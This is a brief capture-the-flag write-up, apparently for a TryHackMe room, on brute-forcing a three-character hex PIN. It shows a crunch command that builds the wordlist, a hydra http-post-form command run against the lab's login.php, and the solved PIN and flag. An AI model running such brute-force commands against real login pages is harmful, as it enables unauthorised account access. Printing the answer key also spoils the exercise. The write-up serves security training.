After completing this task, you will understand:
Password complexity and the number of possible combinations How the number of possible combinations affects the feasibility of brute force attacks Generating password combinations using crunch Trying out passwords automatically using hydra
After the machine is up go to http://machine_ip:8000/login.php
You will be prompted like this:
So basically we need to bruteforce the pin.
for that we need a passwordlist.
TO Generating the Password List. We will use crunch
command: crunch 3 3 0123456789ABCDEF -o 3digits.txt
To brute force with hydra
hydra -l '' -P 3digits.txt -f -v 10.10.139.12 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
After a while you encounter control.php insted of error.php then you will get the pin.
PIN:
6F5
flag:
THM{pin-code-brute-force}